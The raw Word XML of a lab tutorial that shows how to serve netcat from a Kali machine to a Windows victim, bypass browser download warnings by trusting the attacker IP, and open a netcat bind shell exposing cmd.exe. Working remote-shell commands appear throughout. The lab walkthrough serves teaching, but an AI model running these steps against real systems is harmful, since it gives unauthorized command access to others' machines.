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35AAF" w14:textId="1841AE8C" w:rsidR="00656F62" w:rsidRDefault="00656F62">
      <w:r>
        <w:t>Setup: We have a kali linux attack machine and a windows victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527EF9E9" w14:textId="31279AE1" w:rsidR="00656F62" w:rsidRDefault="00656F62">
      <w:r>
        <w:t>We can start by moving into the windows-binaries directory, which is where we store netcat. This makes it easier to transfer the file in a minute, since the path will be local. From within this directory, we can start our python’s simple HTTP server, running across port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70ADCD" w14:textId="126FC90B" w:rsidR="00F8799B" w:rsidRDefault="00F8799B">
      <w:r>
        <w:t>Navigation command: cd /usr/share/windows-binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112D6A6" w14:textId="42301BE7" w:rsidR="00656F62" w:rsidRDefault="00F8799B">
      <w:r>
        <w:t>Server setup c</w:t>
      </w:r>
      <w:r w:rsidR="00656F62">
        <w:t>ommand: python -m SimpleHTTPServer 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745D953E" w14:textId="2E7C5F78" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t>Also, in the screencap below, ignore 4 for now… this is feedback that will show up after step 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F625C23" w14:textId="3D8EC975" w:rsidR="00656F62" w:rsidRDefault="00656F62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="414BAA27" wp14:editId="5B9041F5">
            <wp:extent cx="5939155" cy="1767840"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="133835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ECA4" w14:textId="77777777" w:rsidR="00203257" w:rsidRDefault="00203257"/>
    <w:p w14:paraId="33DA6666" w14:textId="543F71E8" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t>On the target machine, assume we have something like RDP up and running, so we can access the windows and navigate them like a normal desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581175CE" w14:textId="7951E848" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t>In a web browser, put the ip address of the attacker. This will show the contents of the windows-binaries directory, which is where we launched our python simple HTTP Server from. Basically, we’re “serving up” our directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC51FFF" w14:textId="11B6A0B7" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t>The links on the left are executables that are found in that binaries directory, making them easy to access on the victim machine. We’re interested in #3 here, which we can just click to download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A9951" w14:textId="611D6CEC" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1313856F" wp14:editId="7B51C44E">
            <wp:extent cx="5939155" cy="3823335"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5715"/>
            <wp:docPr id="1463113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Well, maybe it’s not so simple as a single click, since windows recognizes this untrusted site could be malicious. They’re right, but we’re going to lie to windows to exploit the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C91E86" w14:textId="230FA3BF" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t>Add the ip address served up to the trusted websites list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5FDB8A" w14:textId="77777777" w:rsidR="00203257" w:rsidRDefault="00203257"/>
    <w:p w14:paraId="5ACFF481" w14:textId="53CB5997" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65D501E5" wp14:editId="5F3A1F30">
            <wp:extent cx="5939155" cy="3100070"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
            <wp:docPr id="1238234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76FA" w14:textId="45959058" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Here’s the panel where you input the url of the server. Again, it’s just the attacker IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD124C" w14:textId="0E491061" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E08745F" wp14:editId="728909C7">
            <wp:extent cx="5939155" cy="3256915"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="10886065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22AE" w14:textId="17E0B726" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t xml:space="preserve">With the site being trusted, we can click on the nc.exe to download it. We get a warning banner, but this is fine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D5D40" w14:textId="2005CC40" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t xml:space="preserve">!! NOTE: the presence of these warning banners should make it clear: this sort of attack is very easy to detect if the process is unmasked. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00203257">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>trojan horse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could mask intentions if we got more complex than this, though, as it stands, we’re looking inside the proverbial horse for how the transport of the soldiers works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246F527" w14:textId="77777777" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F2A1C9" wp14:editId="6D6CC505">
            <wp:extent cx="5939155" cy="3683635"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="2526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7531" w14:textId="2873E92C" w:rsidR="00203257" w:rsidRDefault="00203257">
      <w:r>
        <w:t>On the windows target, I can open up a cmd prompt, navigate to the downloads, and find our freshly downloaded nc.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E339EFA" w14:textId="77777777" w:rsidR="00AE2CD9" w:rsidRDefault="00203257">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7208F979" wp14:editId="69E3750B">
            <wp:extent cx="5939155" cy="3396615"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="2506520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58A6" w14:textId="77777777" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t xml:space="preserve">With this, we can set up a listener. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3C3CF" w14:textId="0AC17B10" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To use a metaphor, this is our “grappling hook”, giving us a rope to climb onto the target ship. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6FE55A" w14:textId="0705DE2C" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t>Command: nc.exe -nvlp 1234 -e cme.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47907B60" w14:textId="648851BE" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t>(English: run netcat, listening on tcp port 1234. When a connection is established, execute cmd.exe, which will give the connection access to a command-prompt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CCC93" w14:textId="3B9AC54B" w:rsidR="00203257" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062E7E52" wp14:editId="38D7AA4F">
            <wp:extent cx="5015865" cy="522605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14038850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4925" w14:textId="1B3FE8E1" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t>On Linux attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAD869F" w14:textId="7F6DBEE7" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t>Command: nc -nv ip.of.target 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E303C4" w14:textId="3001A493" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t>(English: use netcat, with typical verbose network connection, on the target ip address, over port 1234  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A549543" w14:textId="78BB031E" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t xml:space="preserve">Note: both of these are using 1234 to communicate. This must match and not be occupied by another service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755D0EA" w14:textId="23E41413" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t>Reminder: listeners get -nvlp, attackers do -nv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D8219" w14:textId="7F41C0CD" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7705F764" wp14:editId="6800BC39">
            <wp:extent cx="5686425" cy="3248025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14449382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2C43" w14:textId="0812CDC8" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t xml:space="preserve">Above, we see how this has opened a command line session, which gives us access to the target system directly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83CC05" w14:textId="09B43CF7" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9">
      <w:r>
        <w:t>Overall, this is how we could use RDP access, where we might not have direct command line access, to getting that CMD to execute through a bind shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676494D2" w14:textId="77777777" w:rsidR="00AE2CD9" w:rsidRDefault="00AE2CD9"/>
    <w:sectPr w:rsidR="00AE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62"/>
    <w:rsid w:val="00004459"/>
    <w:rsid w:val="00203257"/>
    <w:rsid w:val="00656F62"/>
    <w:rsid w:val="00AE2CD9"/>
    <w:rsid w:val="00D016AA"/>
    <w:rsid w:val="00F8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DCBE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FFEF4E44-8D36-4C4A-B318-0051405C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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-17T15:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-17T15:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>